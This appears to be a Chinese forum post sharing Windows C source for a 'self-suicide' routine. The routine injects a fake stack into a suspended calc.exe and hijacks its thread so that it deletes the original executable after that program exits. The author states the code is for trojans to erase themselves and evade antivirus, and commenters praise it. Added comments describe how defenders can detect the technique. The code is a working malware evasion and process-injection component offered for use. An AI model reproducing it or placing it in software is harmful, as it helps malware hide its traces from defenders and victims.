程序自杀代码

#include <windows.h>

/*
 * DeleteMyself - remove this executable's file from disk via a helper process.
 *
 * What the code below does: a helper (pHelper, or "calc.exe" when NULL) is
 * started CREATE_SUSPENDED; its main thread's x86 register context is then
 * rewritten so that, once resumed, it runs WaitForSingleObject on an
 * inheritable SYNCHRONIZE handle to the current process, DeleteFileW on this
 * module's own path, and finally ExitProcess. The page's author states the
 * purpose: letting a trojan delete its own image after it has run.
 *
 * Detection / mitigation notes (defender view): the API chain
 * CreateProcessW(CREATE_SUSPENDED) -> VirtualAllocEx(..., PAGE_EXECUTE_READWRITE)
 * -> WriteProcessMemory -> SetThreadContext -> ResumeThread against a freshly
 * spawned process is the same telemetry signature as process-hollowing style
 * injection and is routinely alerted on by EDR and Sysmon-type logging; a
 * benign utility such as calc.exe deleting an unrelated, just-exited
 * executable is a second anomaly worth correlating. The routine is 32-bit
 * only: it writes ctx.Eip and ctx.Esp, which a 64-bit CONTEXT does not have.
 *
 * pHelper: optional NUL-terminated command line of the helper to launch;
 *          NULL selects the literal L"calc.exe".
 * Returns TRUE once the helper thread has been resumed, FALSE on any failure.
 * Side effects: leaves a 512 KiB RWX region and a copied path buffer in the
 * helper, and never closes hSYNC (it is meant to be inherited by the helper).
 */
BOOL DeleteMyself(WCHAR *pHelper)
{
    int ret;
    WCHAR helper[MAX_PATH];

    /* Zero-fill first so the bounded wcsncpy below cannot leave helper unterminated. */
    ZeroMemory(helper, sizeof(helper));
    if (pHelper)
        wcsncpy(helper, pHelper, MAX_PATH-2);
    else
        wcscpy(helper, L"calc.exe");

    STARTUPINFOW si = {sizeof(STARTUPINFOW),0};
    PROCESS_INFORMATION pi;

    /* Inheritable (bInheritHandle = TRUE) SYNCHRONIZE handle to ourselves; the helper waits on it
     * before deleting the file, so the deletion happens only after this process has exited. */
    HANDLE hSYNC = OpenProcess(SYNCHRONIZE, TRUE, GetCurrentProcessId());

    /* bInheritHandles = TRUE makes hSYNC valid in the helper; CREATE_SUSPENDED lets the
     * thread context be replaced before the helper executes a single instruction. */
    if (CreateProcessW(NULL, helper, 0, 0, TRUE, CREATE_SUSPENDED, 0, 0, &si, &pi))
    {
        CONTEXT ctx = {CONTEXT_FULL,0};
        ret = GetThreadContext(pi.hThread, &ctx);

        WCHAR MyselfPath[MAX_PATH];
        int nPathLen = GetModuleFileNameW(NULL, MyselfPath, MAX_PATH);   /* character count, terminator excluded */

        /* Image of the helper's initial stack. The field order encodes the call chain
         * WaitForSingleObject -> DeleteFileW -> ExitProcess in x86 stdcall layout
         * (return address followed by the callee's arguments). */
        struct StackContext
        {
            DWORD_PTR DeleteFileW;
            DWORD_PTR WaitForSingleObject_argv1;
            DWORD_PTR WaitForSingleObject_argv2;
            DWORD_PTR ExitProcess;
            DWORD_PTR DeleteFileW_argv1;
            DWORD_PTR shit;                          /* slot where ExitProcess's return address would sit; zeroed below */
            DWORD_PTR ExitProcess_argv1;
        }stackctx;

        HMODULE hKernel32 = GetModuleHandleW(L"Kernel32.dll");

        /* Helper resumes directly inside WaitForSingleObject, with ESP pointing into a
         * freshly allocated RWX region (the RWX allocation itself is a common alert trigger). */
        ctx.Eip = (DWORD_PTR)GetProcAddress(hKernel32, "WaitForSingleObject");
        ctx.Esp = (DWORD_PTR)VirtualAllocEx(pi.hProcess, 0, 512*1024, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
        ctx.Esp += 256*1024;   /* stack pointer placed in the middle of the region */

        stackctx.DeleteFileW = (DWORD_PTR)GetProcAddress(hKernel32, "DeleteFileW");
        stackctx.WaitForSingleObject_argv1 = (DWORD_PTR)hSYNC;   /* inherited handles keep their value in the child */
        stackctx.WaitForSingleObject_argv2 = (DWORD_PTR)-1;      /* INFINITE */
        stackctx.ExitProcess = (DWORD_PTR)GetProcAddress(hKernel32, "ExitProcess");

        /* Copy our own path into the helper's address space so DeleteFileW can read it there. */
        stackctx.DeleteFileW_argv1 = (DWORD_PTR)VirtualAllocEx(pi.hProcess, 0, (nPathLen+1)*sizeof(WCHAR), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
        ret = WriteProcessMemory(pi.hProcess, (LPVOID)stackctx.DeleteFileW_argv1, MyselfPath, (nPathLen+1)*sizeof(WCHAR), NULL);
        if (!ret) return FALSE;   /* helper is left suspended on this path: a lingering suspended calc.exe is a visible artifact */

        stackctx.shit = 0;
        stackctx.ExitProcess_argv1 = 0;   /* exit code passed to ExitProcess */

        /* Write the fake stack frame at the new ESP, then install the modified context. */
        ret = WriteProcessMemory(pi.hProcess, (LPVOID)(ctx.Esp), &stackctx, sizeof(stackctx), NULL);
        if (!ret) return FALSE;

        ret = SetThreadContext(pi.hThread, &ctx);
        if (!ret) return FALSE;

        /* From here the helper runs the chain on its own; this process can exit at any time. */
        ResumeThread(pi.hThread);
        CloseHandle(pi.hThread);
        CloseHandle(pi.hProcess);
        return TRUE;
    }else
    {
        return FALSE;
    }
}

/* Entry point: runs the self-deletion routine with the default helper (0 -> L"calc.exe").
 * The BOOL result of DeleteMyself is ignored, so failure is not reported. */
int main()
{
    DeleteMyself(0);
    return 0;
}

//2000/xp/2003/vista 上已经测试通过

此代码用于木马在运行完后,在内存中将自己的进程结束,从而躲过杀毒软件的查杀!!慎用!

xiaowuhello
很强大的

很强大的 木马是在是太厉害了

ssfi
黑客就要像你这样厉害

黑客就要像你这样厉害...
